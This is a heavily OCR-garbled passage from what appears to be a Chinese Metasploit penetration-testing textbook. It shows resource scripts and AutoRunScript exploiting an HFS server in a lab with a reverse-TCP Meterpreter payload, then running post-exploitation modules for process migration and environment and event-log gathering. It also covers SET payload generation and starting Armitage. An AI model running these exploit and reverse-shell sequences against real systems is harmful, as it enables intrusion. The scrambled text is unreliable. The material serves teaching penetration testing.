[*] Starting the payload handler... 

^C[-] Exploit failed: Interrupt 

[*] Exploit completed, but no session was created. 

msf exploit(handler) > makerc 

Usage: makerc «output rc file» 


Save the commands executed since startup to the specified file. 


msf exploit(handler) > makerc multi hand 
[*] Saving last 6 commands to multi hand ... 
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由 上 图 可 知 ， 我 们 通过 设置 攻击 载 科 和 各 种 选项 ( 例如 LHOST 和 LPORT ) 成 功 启动 了 一 个 渗 
透 模块 handler， 输 入 makerc 命 令 就 可 以 将 这 些 命令 保存 到 一 个 指定 的 文件 中 。 在 这 个 案例 中 是 
multi_hand 文 件 ， 我 们 保存 了 最 近 使 用 的 6 条 命令 。 如 下 图 所 示 使 用 这 个 资源 脚本 。 


msf > resource multi hand 

[*] Processing multi hand for ERB directives. 

resource (multi hand)» use exploit/multi/handler 

resource (multi hand)» set payload windows/meterpreter/reverse tcp 
payload -» windows/meterpreter/reverse tcp 

resource (multi hand)» set LHOST 192.168.10.112 

LHOST => 192.168.10.112 

resource (multi hand)» set LPORT 4444 

LPORT => 4444 

resource (multi hand)» exploit 


*] Started reverse TCP handler on 192.168.10.112:4444 
*] Starting the payload handler... 


输入 resource 命 令 和 脚本 的 名 字 就 可 以 自动 粘贴 脚本 中 保存 的 命令 ， 从 而 避免 对 选项 进行 
重复 的 设置 。 


9.5 在 Metasploit 中 使 用 AutoRunScript 


Metasploit 还 提供 了 十 分 强大 的 AutoRunScript 工 具 , 可 以 通过 输入 show advanced 命 令 查 
看 AutoRunScript 的 选项 。 它 可 以 实现 自动 化 的 后 渗透 测试 ， 只 需 执 行 一 次 就 可 以 获得 对 目标 
的 控制 权限 。 我 们 可 以 通过 输入 set AutoRunScript[script-name] 来 设置 AutoRunScript 
的 选项 ， 也 可 以 在 资源 脚本 中 直接 设置 ， 后 者 可 以 一 次 性 自动 完成 全 部 渗透 操作 和 后 渗透 操作 。 
通过 使 用 multi_script 和 multi_console_commangd 模 块 ，AutoRunScript 还 可 以 一 次 运行 
多 个 后 渗透 脚本 。 下 面 来 看 一 个 使 用 了 两 个 脚本 的 示例 ,一 个 用 于 自动 化 的 渗透 测试 ， 另 一 个 用 
于 自动 化 的 后 渗透 测试 ， 如 下 图 所 示 。 


GNU nano 2.2.6 File: multi scrip 


run post/windows/gather/checkvm 
run post/windows/manage/migrate 


上 面 给 出 的 是 一 个 实现 了 checkvm ( 检查 目标 系 统 是 否 运行 在 虚拟 环境 的 借据 ) 和 migrate 
〈 将 攻击 载荷 迁移 到 安全 进程 的 模块 ) 模块 自动 化 的 后 渗透 脚本 ， 这 个 脚本 十 分 小 巧 。 下 面 就 来 
看 看 这 个 渗透 测试 脚本 的 内 容 。 


GNU nano 2.2.6 File: resource complete 


图 se exploit/windows/http/rejetto hfs exec 

set payload windows/meterpreter/reverse tcp 

set RHOST 192.168.10.109 

set RPORT 8081 

set LHOST 192.168.10.112 

set LPORT 2222 

set AutoRunScript multi console command -rc /root/my scripts/multi script 
exploit 
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上 面 的 资源 脚本 设置 了 对 HFS 文 件 服务 器 进行 渗透 所 必需 的 所 有 参数 , 并 实现 了 攻击 的 自动 
化 。 也 可 以 使 用 multi_console_command 对 AutoRunScript 进 行 设置 ， 将 multi_console_ 


commangd 设 定 为 -rc， 


这 样 就 允许 执行 多 个 后 渗透 脚本 了 。 这 个 过 程 如 同上 图 所 示 。 
接 下 来 运行 渗透 测试 的 脚本 ， 并 分 析 它 的 执行 结果 。 


resource 
RHOST => 
resource 
RPORT => 
resource 
LHOST => 
resource 
LPORT => 
resource 


[*] 192.168.10.109 


Imsf > resource /root/my_scripts/resource complete 

[*] Processing /root/my scripts/resource complete for ERB directives. 

resource (/root/my scripts/resource complete)» use exploit/windows/http/rejetto hfs exec 
resource (/root/my scripts/resource complete)» set payload windows/meterpreter/reverse tcp 
payload => windows/meterpreter/reverse tcp 

(/root/my scripts/resource i 


192.168.10.109 
(/root/my scripts/resource 
8081 

(/root/my scripts/resource 
192.168.10.112 
(/root/my scripts/resource 
2222 

(/root/my scripts/resource 


[*] Started reverse TCP handler on 192.168.10.112:2222 
[*] Using URL: http://0.0.0.0:8080/SP6W08sSPhH 
[*] Local IP: http://192.168.10.112:8080/SP6WO8sSPhH 
[*] Server started. 
I*] Sending a malicious request to / 
[*] Sending stage (957487 bytes) to 192.168.10.109 
rejetto hfs exec - 192.168.10.109:8081 - Payload request received: /SP6WOB8sSPhH 
[*] Meterpreter session 1 opened (192.168.10.112:2222 -> 192.168.10.109:49217) at 2016-07-11 00:42:05 40530 

Tried to delete STEMP*pRizJBaJheeoPB.vbs, unknown result 
[*] Sending stage (957487 bytes) to 192.168.10.109 
[*] Session ID 1 (192.168.10.112:2222 -> 192.168.10.109:49217) processing AutoRunScript 'multi console command -rc /root/my scripts/multi script" 
[*] Meterpreter session 2 opened (192.168.10.112:2222 -» 192.168.10.109:49222) at 2016-07-11 00:42:07 40530 
I*] Running Command List ... 
I*1 Running command run post/windows/gather/checkvm 
[*] Checking if WIN-SWIKKOTKSHX is a Virtual Machine ..... 
[*] Session ID 2 (192.168.10.112:2222 -> 192.168.10.109:49222) processing AutoRunScript 'multi console command -rc /root/my scripts/multi script" 
I*] Running Command List ... 


I*1 Running command run post/windows/gather/checkvm 
[*] This is a Sun VirtualBox Virtual Machine 
I*1 Running command run post/windows/manage/migrate 


[*] Checking if WIN-SWIKKOTKSHX is a Virtual Machine ..... 
[*] Running module against WIN-SWIKKOTKSHX 

[*] Current server process: notepad. 
I*] Spawning notepad.exe process to migrate to 

[*] This is a Sun VirtualBox Virtual Machine 

I*1 Running command run post/windows/manage/migrate 
Migrating to 2964 
Server stopped. 


meterpreter > 
[*] Running module against WIN-SWIKKOTKSHX 
[*] Current server process: 
[*] Spawning notepad.exe process to migrate to 


| complete)» set RPORT 8081 

' complete)» set LHOST 192.168.10.112 

| complete)» set LPORT 2222 

| complete)» set AutoRunScript multi console command -rc /root/my scripts/multi script 


AutoRunScript => multi console command -rc /root/my scripts/multi script 
resource (/root/my scripts/resource complete)» exploit 


UNJxwKFkUTU.exe (2940) 


complete)» set RHOST 192.168.10.109 


exe (3316) 


当 渗 透 测试 结束 时 , 我 们 获得 了 如 上 图 所 示 的 结果 : checkvm 和 migrate 两 个 模块 都 已 经 成 


功 执行 ,而 且 目 标 和 运行 在 Sun 公 司 的 VirtualBox 虚 拟 机 上 ， 控 制程 序 也 已 经 迁移 到 notepad.exe 进 
程 中 。 脚 本 成 功 运行 之 后 ， 


就 可 以 看 到 如 下 输出 。 


meterpreter > 

[*] Running module against WIN-SWIKKOTKSHX 

[*] Current server process: UNJxwKFkUTU.exe (2940) 

[*1 Spawning notepad.exe process to migrate to 
Migrating to 3120 
Successfully migrated to process 2964 
Successfully migrated to process 3120 


我 们 已 经 成 功 将 控制 程序 迁移 到 了 notepad.exe 进 程 上 。 不 过 如 果 notepad.exe 有 多 个 运行 的 实 


例 ， 还 可 以 将 其 


使 用 AutoRunScript 选 


迁移 到 其 他 进程 上 。 


先 项 中 的 multiscript 模 块 


可 以 使 用 multiscript 模 块 代 替 multi_console_command 模 块 。 来 创建 一 个 后 渗透 脚本 ， 
如 下 图 所 示 。 
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GNU nano 2.2.6 File: multi _ scr. rc 
checkvm 
migrate -n explorer.exe 
get env 


event manager -i 


从 上 图 可 以 看 出 ,我 们 已 经 成 功 创建 了 一 个 名 为 multi_scr.re 的 后 渗透 脚本 。 现 在 修改 一 下 
个 后 渗透 脚本 ， 修 改 后 的 脚本 如 下 图 所 示 。 


GNU nano 2.2.6 File: resource comp 


se exploit/windows/http/rejetto_hfs_exec 

set payload windows/meterpreter/reverse tcp 

Set RHOST 192.168.10.109 

Set RPORT 8081 

set LHOST 192.168.10.105 

set LPORT 2222 

set AutoRunScript multiscript -rc /root/my scripts/multi scr.rc 
exploit 


如 上 图 所 示 ， 只 需要 使 用 multiscript 来 蔡 换 multi_ console_command， 
透 脚本 的 路 径 即 可 。 下 面 来 看 看 执行 这 个 后 渗透 脚本 后 会 发 生 什么 。 


msf > resource /root/my_scripts/resource_compLete 

[*] Processing /root/my scripts/resource complete for ERB directives. 

resource (/root/my scripts/resource complete)» use exploit/windows/http/rejetto hfs e 
xec 

resource (/root/my scripts/resource complete)» set payload windows/meterpreter/revers 
le tcp 

payload => windows/meterpreter/reverse tcp 

resource (/root/my scripts/resource complete)» set RHOST 192.168.10.109 

RHOST => 192.168.10.109 

resource (/root/my_scripts/resource_complete)> set RPORT 8081 

RPORT => 8081 

resource (/root/my_scripts/resource_complete)> set LHOST 192.168.10.105 

LHOST => 192.168.10.105 

resource (/root/my_scripts/resource_complete)> set LPORT 2222 

LPORT => 2222 

resource (/root/my_scripts/resource_complete)> set AutoRunScript multiscript -rc /roo 
[t/my scripts/multi scr.rc 

AutoRunScript => multiscript -rc /root/my scripts/multi scr.rc 

resource (/root/my scripts/resource complete)» exploit 


*] Started reverse TCP handler on 192.168.10.105:2222 
*] Using URL: http://0.0.0.0:8080/e1kYsP 
*] Local IP: http://192.168.10.105:8080/e1kYsP 
*] Server started. 
*] Sending a malicious request to / 
*] 192.168.10.109 rejetto hfs exec - 192.168.10.109:8081 - Payload request receive 
: /elkYsP 
*] Sending stage (957487 bytes) to 192.168.10.109 
*] Meterpreter session 7 opened (192.168.10.105:2222 -» 192.168.10.109:49273) at 201 
-07-11 13:16:01 +0530 
Tried to delete %TEMP%\IlMpSDXbuGy.vbs, unknown result 
[*] Session ID 7 (192.168.10.105:2222 -> 192.168.10.109:49273) processing AutoRunScri 
pt 'multiscript -rc /root/my scripts/multi scr.rc' 
[*] Running Multiscript script..... 
[*] Running script List ... 
[*1 running script checkvm 
[*] Checking if target is a Virtual Machine ..... 
[*] 
[*] 
[*] 


[ 
[ 
[ 
[ 
[ 
[ 
ld 
[ 
[ 
6 


This is a Sun VirtualBox Virtual Machine 

running script migrate -n explorer.exe 
Current server process: egmvsHerJGkWWt.exe (2476) 
Migrating to 3568 


[n 


然后 更 新 后 渗 


当 我 们 获得 目标 系统 的 控制 权限 之 后 ^ checkvm 模 块 就 会 开始 执行 ; 之 后 migrate .get env 
和 event_manager 命 令 依 次 执行 ， 如 下 图 所 示 。 
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meterpreter > Successfully migrated to process 
[*1 running script get env 
[*] Getting all System and User Variables 


Enviroment Variable list 


PROCESSOR ARCHITECTURE x86 


PROCESSOR LEVEL 


[*] Retriving Event Log Configuration 


Event Logs on System 


Name Retention Maximum Size Records 


Name Value 

APPDATA C: \Users\mm\AppData\Roaming 
ComSpec C: Windows NVsystem32Ncmd. exe 
FP NO HOST CHECK NO 

HOMEDRIVE C: 

HOMEPATH \Users\mm 

LOCALAPPDATA C: \Users\mm\AppData\Local 
LOGONSERVER \\WIN-SWIKKOTKSHX 

NUMBER OF PROCESSORS 1 

os Windows_NT 

PATHEXT .COM; .EXE; .BAT; .CMD; . VBS; . VBE; . JS; . JSE; .WSF ; .WSH; .MSC 


PROCESSOR_IDENTIFIER x86 Family 6 Model 60 Stepping 3, GenuineIntel 


PROCESSOR REVISION 3c03 

Path C: Windows Nsystem32; C: Windows; C: Windows VSys tem32WWbem; C : NW 
indowsVXSys tem32WindowsPowerShellv1.0V 

TEMP C: \Users\mm\AppData\Local\Temp\1 

THP C: \Users\mm\AppData\Local\Temp\1 

USERDOMAIN WIN-SWIKKOTKSHX 

USERNAME mm 

USERPROFILE C:\Users\mm 

windir C:\Windows 

[*] running script event manager -i 


在 资源 脚本 中 使 用 event_manager 模 块 和 参数 -1 可 以 查看 目标 系统 上 的 所 有 日 志 。 执 行 


event_manager 命 令 的 结果 如 下 图 所 示 。 


[*] running script event manager -i 
[*] Retriving Event Log Configuration 


Event Logs on System 


Name Retention Maximum Size 
Application Disabled 20971520K 
HardwareEvents Disabled 20971520K 
Internet Explorer Disabled K 

Key Management Service Disabled 20971520K 
Security Disabled K 

System Disabled 20971520K 
Windows PowerShell Disabled 15728640K 


Records 


Access Denied 


1212 
200 


9.6 Metasploit 中 的 全 局 变量 


当 我 们 要 对 特定 范围 内 的 主机 或 者 特定 主机 进行 渗透 的 时 候 ， 就 可 以 使 用 setg 命 令 来 指定 
LHOST 和 RHOST 选 项 。 使 用 setg 命 令 可 以 实现 RHosT 或 者 LHOST 选 项 的 全 局 化 ， 让 它们 可 以 被 所 
有 模块 使 用 。 因 此 ， 使 用 setg 命 令 就 可 以 避免 重复 设置 这 些 选项 。 我 们 应 当 充 分 利用 setg 命 令 


来 进行 选项 的 设置 ， 如 LPORT、RPORT 和 payload。 但 因为 不 同 的 服务 


通常 运行 在 不 同 的 端口 ， 
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而 且 我 们 有 时 也 需要 修改 攻击 载荷 ， 所 以 预先 统一 设 定 在 所 有 模块 中 都 通用 的 选项 是 更 好 的 方 
法 。 下 面 来 看 一 个 示例 。 


Sf > setg RHOST 192.168.10.112 
RHOST => 192.168.10.112 
Imsf > use exploit/windows/smb/ms08 067 netapi 
msf exploit(ms08 067 netapi) > get RHOST 
RHOST => 192.168.10.112 
msf exploit (ms08_067_netapi) > use exploit/windows/ftp/freefloatftp_user 
msf exploit(freefloatftp user) > get RHOST 
OST => 192.168.10.112 
f exploit(freefloatftp user) > back 

sf > getg RHOST 
RHOST => 192.168.10.112 


由 上 图 可 知 ,我 们 使 用 setg 命 令 设置 了 RHOST。 无 论 我 们 使 用 多 少 个 模块 ,所 有 模块 的 RHOST 
值 都 不 会 发 生 改变 ,我们 也 无 须 在 每 个 模块 中 重新 手动 输入 RHOST 值 。get 命 令 用 来 显示 一 个 变 
量 的 值 ， 而 getg 命 令 用 来 显示 一 个 全 局 变量 的 值 。 


9.7 自动 化 社会 工程 学 工具 包 


社会 工程 学 工具 包 (Social Engineering Toolkit, SET ) 是 一 套 基于 Python 语言 的 工具 集合 ， 
主要 面向 对 人 进行 的 渗透 测试 。 使 用 SET 可 以 实现 多 种 攻击 , 例如 网 络 钓鱼 攻击 、 网 页 劫持 攻击 、 
格式 文件 攻击 等 。 网 页 劫持 攻击 是 指 将 受害 者 从 本 来 要 访问 的 正常 网 页 转移 到 另 一 个 网 页 。 格 式 
文件 攻击 指 的 是 针对 目标 受害 者 的 某 个 特定 软件 进行 攻击 。 使 用 社会 工程 学 工具 包 最 大 的 便利 之 
处 在 于 它 采用 了 菜单 驱动 的 方法 ， 通 过 这 个 方法 可 以 快速 建立 渗透 攻击 向 量 。 


如 果 想 获取 SET 相 关 教 程 ， 请 访问 http://www.social-engineer.org/framework/ 
se-tools/computer-based/social-engineer-toolkit-set/。 


使 用 SET 可 以 快速 生成 客户 端 渗 透 的 模板 文件 , 但 是 使 用 自动 化 脚本 的 生成 速度 更 快 。 下 面 
给 出 了 一 个 示例 。 


Iroot@mm: /usr/share/set# ./seautomate se-script 

[*] Spawning SET in a threaded process... 

[*] Sending command 1 to the interface... 

[*] sending command 4 to the interface... 

[*] Sending command 2 to the interface... 

[*] Sending command 192.168.10.103 to the interface... 

[*] Sending command 4444 to the interface... 

[*] sending command yes to the interface... 

[*] Sending command default to the interface... 

[*] Finished sending commands, interacting with the interface.. 


如 上 图 所 示 , 我 们 在 seautomate 工 具 中 使 用 了 一 个 se-script 脚 本 , 执行 后 产生 了 一 个 攻击 载 
荷 并 自动 建立 了 一 个 渗透 模块 handler。 现 在 来 详细 分 析 这 个 脚本 。 
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GNU nano 


192.168.10. 


4444 
yes 


2525 File: se-script 


103 


Modified 


你 想 不 想 知道 脚本 中 的 数字 和 攻击 载荷 的 产生 、 渗 透 模块 handler 的 建立 有 什么 


正如 之 前 所 讨论 的 ，SET 是 一 个 沫 单 驱 动 的 工具 ， 因 此 这 些 数 字 表 示 的 就 是 


自动 化 过 程 分 解 成 单个 步骤 来 逐个 分 析 。 


现在 将 这 个 


脚本 中 的 第 


1) 
2) 
3) 
4) 
5) 
6) 


99) 


Social-Engineering Attacks 
Penetration Testing (Fast-Track) 
Third Party Modules 

Update the Social-Engineer Toolkit 
Update SET configuration 

Help, Credits, and About 


Exit the Social-Engineer Toolkit 


脚本 中 的 下 一 个 数字 是 4， 


Spear-Phishing Attack Vectors 
Website Attack Vectors 
Infectious Media Generator 
Create a Payload and Listener 
Mass Mailer Attack 
Arduino-Based Attack Vector 
Wireless Access Point Attack Vector 
QRCode Generator Attack Vector 
Powershell Attack Vectors 

SMS Spoofing Attack Vector 
Third Party Modules 


Return back to the main menu. 


再 下 一 个 数字 是 2， 这 意味 着 
所 示 。 


攻击 载荷 的 类 


Windows Shell Reverse TCP 

Windows Reverse TCP Meterpreter 
Windows Reverse TCP VNC DLL 
Windows Shell Reverse TCP X64 
Windows Meterpreter Reverse TCP X64 
Windows Meterpreter Egress Buster 
Windows Meterpreter Reverse HTTPS 
Windows Meterpreter Reverse DNS 
Download/Run your Own Executable 


set:payloads»2 


x 


MEAM 


型 为 Windows Reverse TCP Meterpreter, 


XA? 


选项 的 ID。 


个 数字 是 1。 当 在 菜单 中 选择 1 时 , 就 表示 选择 了 Social-Engineering Attacks 选 项 


这 意味 着 要 选择 下 图 所 示 菜 单 中 的 Create a Payload and Listener 选 项 。 


如 下 图 
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接 下 来 需要 指定 监听 器 的 卫 地 址 ,也 就 是 将 该 地 址 设 定 为 脚本 中 的 192.168.10.103。 可 以 
手动 设 定 这 个 地 址 。 


set:payloads» IP address for the payload listener (LHOST):192.168.10.113 


下 一 条 命令 的 数值 是 4444， 这 也 是 监听 器 的 端口 号 。 


set:payloads» Enter the PORT for the reverse listener:4444 
Generating the payload.. please be patient. 
Payload has been exported to the default SET directory located under: /root/.set/payload.exe 


脚本 中 的 再 下 一 条 命令 是 yes ， 表 示 初 始 化 监听 器 。 


set:payloads» Do you want to start the payload and listener now? (yes/no):yes 


提供 了 yes 之 后 ， 控 制 权 就 切换 到 了 Metasploit 手 中 。Metasploit 自 动 建立 了 一 个 渗透 反 向 
handler， 如 下 面 的 截图 所 示 。 


[*] Processing /root/.set/meta config for ERB directives. 
resource (/root/.set/meta config)» use multi/handler 
resource (/root/.set/meta config)» set payload windows/meterpreter/reverse tcp 
payload -» windows/meterpreter/reverse tcp 

resource (/root/.set/meta config)» set LHOST 192.168.10.113 
[HOST => 192.168.10.113 

resource (/root/.set/meta config)» set LPORT 4444 

ILPORT => 4444 

resource (/root/.set/meta config)» set ExitOnSession false 
ExitOonSession => false 

resource (/root/.set/meta config)» exploit -j 

[*] Exploit running as background job. 


我 们 可 以 使 用 类 似 的 方法 实现 任何 SET 攻击 的 自动 化 。SET 在 生成 客户 端 渗透 的 自 定 义 攻 击 
载荷 时 可 以 节省 大 量 时 间 。 不 过 如 果 使 用 seautomate 工 具 的 话 ， 速 度 可 以 变 得 更 快 。 
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这 一 整 章 的 研究 重点 都 是 如 何 使 用 Metasploit 加 快 渗透 测试 的 速度 。 本 章 介绍 了 pushm、 
popm、loadpath、reload 和 edit 等 可 以 加 快 开发 和 测试 进程 的 命令 。 男 外 也 介绍 了 如 何 创 建 
资源 脚本 和 使 用 AutoRunScript。 我 们 还 学 习 了 全 局 变量 的 设置 、 攻 击 载荷 的 自动 化 生成 和 使 
用 SET 建立 渗透 模块 handler 等 操作 。 


下 一 章 将 会 使 用 Metasploit 最 为 流行 的 图 形 化 界面 工具 Armitage 来 实现 渗透 化 测试 , 还 会 介绍 
Cortana 脚 本 的 编写 ， 以 及 其 他 可 以 使 用 Armitage 管 理 的 攻击 向 量 。 


利用 Armitage 实 现 
Metasploit 的 可 视 化 管理 


“浪漫 的 本 质 是 展露 脆弱 ， 是 万 事 不 算计 的 艺术 ， 是 情愿 看 起 来 傻 傻 的 ， 是 表白 的 
一 一 “这 就 是 我 。 我 对 你 充满 了 兴趣 ， 所 以 向 你 展示 我 所 有 的 缺点 ， 并 且 期 望 着 你 
抱 我 全 部 的 优点 和 缺点 。”” 


SE NS 
y A 
3s 


— — Ashton Kutcher 

上 一 章 已 经 介绍 了 如 何 加 快 渗透 测 试 的 速度 。 接 下 来 会 学 习 另 一 个 优秀 的 工具 , 使 用 这 个 工 
具 也 会 提高 渗透 测试 的 效率 。 

Armitage 是 一 个 图 形 化 操作 工具 ， 通过 它 可 以 轻松 地 管理 Metasploit。Armitage 实 现 了 
Metasploit 所 有 操作 的 可 视 化 ， 也 会 根据 情况 给 出 建议 。Armitage 还 是 进行 Metasploit 访 问 共 享 和 
团队 管理 工作 最 有 力 的 工具 。 

本 章 将 介绍 Armitage 及 其 功能 , 并 将 深入 探讨 如 何 使 用 Metasploit 的 这 个 可 视 化 工具 进行 渗透 
测试 。 本 章 的 后 半 部 分 还 会 介绍 如 何 编 写 Armitage 的 Cortana 脚 本 。 

本 章 将 着 眼 于 以 下 几 个 要 点 。 

口 使 用 Armitage 进 行 渗透 测试 。 

口 使 用 Armitage 进 行 远程 攻击 和 客户 端 攻击 。 
口 对 目标 网 络 和 主机 扫描 操作 的 管理 。 

口 Armitage 的 后 渗透 模块 。 

口 Cortana 脚 本 的 基础 知识 。 

口 在 Armitage 中 使 用 Cortana 脚 本 进行 攻击 。 


好 了 ， 和 Armitage 携 手 开始 这 上段 渗透 测试 的 旅程 吧 。 


10.1 Armitage 的 基本 原理 


Armitage 是 一 个 攻击 管理 工具 , 它 


NE 


图 形 化 方式 实现 了 Metasploit 框 架 的 自动 化 攻击 。Raphael 
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Mudge 采 用 Java 构 建 了 Armitage， 它 拥有 器 平台 的 特性 ， 因 此 可 以 在 Windows 和 Linux 这 些 不 同 的 
系统 上 运行 。 


10.1.1 入 门 知 识 


在 本 章 中 ， 我 们 将 在 Kali Linux 环 境 下 使 用 Armitage。 启 动 Armitage 的 步骤 如 下 所 示 。 
(1) 打开 一 个 Linux 终 端 ， 然 后 在 其 中 输入 命令 armitage， 如 下 图 所 示 。 


File Edit View Search Terminal Help 


rooteApex:-£ armitage 


Connect... | -|o E 


127.0.0.1 


Port 55553 


User msf 


Pass test 


Connect Help 


(2) 这 时 会 弹出 一 个 对 话 框 ， 单 击 对 话 框 上 的 Connect 按 钮 来 建立 一 个 到 Metasploit 的 连接 。 


(3) 为 了 保证 Armitage 能 正常 启动 ,Metasploit 中 的 远程 过 程 调用 ( Remote Procedure Call, RPC ) 
服务 器 必须 先 运 行 起 来 。 在 之 前 的 弹出 对 话 框 中 单 击 Connect 按 钮 后 ， 一 个 新 的 对 话 框 就 会 弹出 


来 。 这 个 对 话 框 会 问 我 们 是 否 想 启动 Metasploit 的 RPC 服 务 。 单 击 下 面 的 屏幕 截图 中 的 Yes 按 钮 。 


Start Metasploit? 


^ 


A Metasploit RPC server is not running or 
not accepting connections yet. Would you 


like me to start Metasploit's RPC server 
for you? 


v) E 


(4) 需要 花费 一 点 时 间 等 待 Metasploit 的 RPC 服 务 启动 并 运行 起 来 。 在 这 个 过 程 中 ， 我 们 将 会 
看 到 消息 Connection refused 不 断 出 现 。 这 是 因为 Armitage 一 直 在 测试 到 目标 的 连接 是 否 已 经 建立 。 
这 个 过 程 如 下 面 的 屏幕 截图 所 示 。 0 
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Progress... 


Connecting to 127.0.0.1:55553 
java.net.ConnectException: Connection refused 
= 
Cancel 


下 面 是 一 些 在 启动 Armitage 时 需要 注意 的 地 方 。 


a 你 必须 使 用 一 个 root 用 户 权 限 进行 工作 。 
口 如 果 在 Kali Linux 环 境 下 工作 ， 必 须 先 启动 PostgreSQL 数 据 库 服务 和 Metasploit 服 务 。 可 以 


通过 如 下 的 命令 完成 。 


root@kali~:#service postgresql start 
root@kali~:#service metasploit start 


有 关 Armitage 启 动 错 误 的 更 多 信息 ， 请 访问 http:/www.fastandeasyhacking. 
com/start ; 


10.1.2 用户 界面 一 览 
如 果 与 Metasploit 的 连接 正确 无 误 地 建立 了 , 我 们 就 可 以 看 到 Armitage 的 界面 了 。 这 个 界面 看 
起 来 如 下 图 所 示 。 


Armitage View Hosts Attacks Workspaces Help 


» (iij auxiliary 
» (ij exploit " 
* (lij payload P 
» (ijj post 


Console X 


Easy phishing: Set up email templates, landing pages and listeners 


in Metasploit Pro’s wizard -- type 'go_pro' to launch it now. 


[ metasploit 
[ 1064 exploit: 
[ 275 payloads 


- 178 post 
- 8 nops 
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Armitage 的 界面 很 简单 ， 主 要 包含 了 三 个 不 同 的 窗 格 部 分 。 让 我 们 来 仔细 看 看 这 三 个 窗 格 各 
自 的 作用 。 


OQ 第 一 个 窗 格 包含 了 Metasploit 中 的 所 有 功能 模块 的 应 用 ， 这 包括 了 辅助 模块 、 渗 透 模块 、 
攻击 载荷 模块 和 后 渗透 模块 。 我 们 可 以 从 层次 结构 中 浏览 每 一 个 模块 ， 然 后 在 其 中 通过 
双击 来 启动 选中 的 模块 。 此 外 ， 在 第 一 个 窗 格 的 最 下 面 有 一 个 很 小 的 输入 框 ， 可 以 使 用 
它 来 快速 搜索 需要 的 模块 ， 而 不 必 在 层次 结构 中 不 停 地 通过 单 击 进行 选择 。 

a 第 二 个 窗 格 显示 了 网 络 中 当前 所 有 在 线 的 计算 机 。 这 个 窗 格 通常 会 以 特定 的 格式 图 标 来 
显示 计算 机 。 例 如 ， 安 装着 Windows 操 作 系统 的 计算 机 显示 为 一 个 在 显示 器 处 有 Windows 
微 标的 计算 机 图 标 。 与 之 类 似 ，Linux 微 标 代表 着 Linux 操 作 系 统 ， 其 他 徽标 用 来 标识 其 他 
系统 (例如 Mac 等 )。 打 印 机 会 被 标识 为 一 个 打印 机 形象 的 图 标 。 这 种 表示 方法 形象 地 帮 
助 我 们 识别 了 网 络 中 的 设备 类 型 。 

a 第 三 个 窗 格 可 以 完成 所 有 的 操作 、 后 渗透 过 程 、 扫 描 过 程 、Metasploit 的 命令 行 ， 以 及 处 
理 后 渗透 模块 返回 的 结 


10.1.3 工作 区 的 管理 


正如 我 们 在 前 几 章 中 看 到 的 那样 , 工作 区 是 用 来 保存 各 种 不 同 的 攻击 文件 的 。 假 设 我 们 当前 
正在 攻击 指定 范围 的 计算 机 , 可 是 由 于 某 些 突 发 原因 , 不 得 不 停 下 来 转 而 去 测试 男 外 一 个 范围 的 
计算 机 。 在 这 种 情形 下 ， 可 以 创建 一 个 新 的 工作 区 去 测试 新 目标 范围 的 计算 机 ,这样 做 保证 了 测 
试 结果 的 整洁 有 序 。 因 此 ， 在 完成 这 个 工作 区 的 测试 工作 以 后 ， 可 以 切换 到 其 他 工作 区 。 工 作 区 
在 切换 时 可 以 自动 载 和 之 前 保存 过 的 相关 工作 内 容 。 这 个 功能 可 以 实现 在 进行 大 量 扫描 工作 时 单 
独 保存 每 个 目标 的 扫描 结果 。 这 样 就 避免 了 各 种 扫描 结果 杂乱 无 章 地 混在 一 起 。 


如 果 想 要 创建 一 个 新 的 工作 区 , 首先 导航 到 Workspaces 选 项 卡 ， 然 后 单 击 Manage。 这 样 做 将 
会 在 Armitage 中 产生 一 个 新 的 Workspaces 选 项 卡 ， 如 下 面 的 屏幕 截图 所 示 。 


name | hosts | ports os [labels — 1 . |session 


| Activate | | Add | | Edit | | Remove | 


这 个 新 的 选项 卡 在 Armitage 的 第 三 个 窗 格 中 出 现 , 它 可 以 帮助 我 们 展示 所 有 关于 工作 区 的 信 
息 。 目 前 在 这 里 还 看 不 到 任何 东西 ， 因 为 我 们 暂时 还 没有 创建 任何 工作 区 。 
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现在 来 创建 一 个 新 的 工作 区 。 首 先 单 击 Add 按 钮 ， 如 下 面 的 屏幕 截图 所 示 。 


New Workspace e o o0 


Name: Internal Scan 


Hosts: 192.168.10.0/24 


Ports: 


OS: 


Labels: 


[L] Hosts with sessions only 


Add 


我 们 可 以 添加 任意 名 称 的 工作 区 ， 比 如 一 个 为 192.168.10.0/24 的 内 部 地 址 范围 。 下 面 给 出 了 
添加 完 测试 范围 之 后 Workspaces 选 项 卡 。 


cw 


[ console x] Workspaces X | 


name | hosts 


Internal Scan 192.168.10.0/24 


随时 切换 工作 区 。 只 需 选 中 要 操作 的 工作 区 ， 然 后 单 击 Activate 按 钮 即 可 。 


可 


NE 


10.2. 网络 扫描 以 及 主机 管理 


Armitage 中 使 用 独立 的 Hosts 选 项 卡 来 实现 主机 的 管理 操作 和 主机 的 扫描 操作 。 可 以 单 击 导航 
栏 上 Hosts 的 按钮 选项 , 然后 选中 下 拉 菜 单 上 的 Import Host 选 项 从 文件 中 导入 主机 。 也 可 以 在 Hosts 
中 选中 Add Host， 手 动 导入 一 台 主 机 。 


Armitage 也 提供 主机 扫描 的 选项 。 这 些 扫描 分 成 了 两 种 类 型 : Nmap 扫 描 (Nmap scan) ) 和 
MSF 扫描 (MSF scan )。MSF 扫 描 可 以 使 用 Metasploit 中 的 大 量 端 口 和 服务 扫描 模块 ，Nmap 扫 描 
则 可 以 使 用 当前 最 为 流行 的 端口 扫描 工具 Network Mapper (Nmap )。 
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选中 Hosts 选 项 卡 的 MSF scan 选 项 对 网 络 进行 扫描 。 不 过 点 击 MSF scan 之 后 ,Armitage 会 弹出 
一 个 对 话 框 。 这 里 需要 填写 一 个 目标 范围 ， 如 下 面 的 屏幕 截图 所 示 。 


Input 


Enter scan range (e.g., 192.168.1.0/24): 


192.168.10.0/24 
Cancel ok 


输入 目标 的 地 址 范围 以 后 ，Nmap 会 对 目标 范围 内 所 有 主机 的 端口 、 服 务 以 及 操作 系统 进行 
扫描 。 可 以 在 界面 的 第 三 个 窗 格 中 看 到 扫描 的 详细 信息 ， 如 下 图 所 示 。 


| [ Console X | Workspaces X | scan x| 


msf auxiliary(smb version) » set RHOSTS 192.168.10.1, 192.168.10.110, 192.168.10.105, 192.168.10.109 

RHOSTS => 192.168.10.1, 192.168.10.110, 192.168.10.105, 192.168.10.109 

msf auxiliary(smb version) » run -j 

[*] Auxiliary module running as background job 

] 192.168.10.110:445 is running Windows 2012 R2 Standard (build:9600) (name:WIN-3KOU2TIJ4EO) (domain:WIN-3KOU2TIJ4E0) 
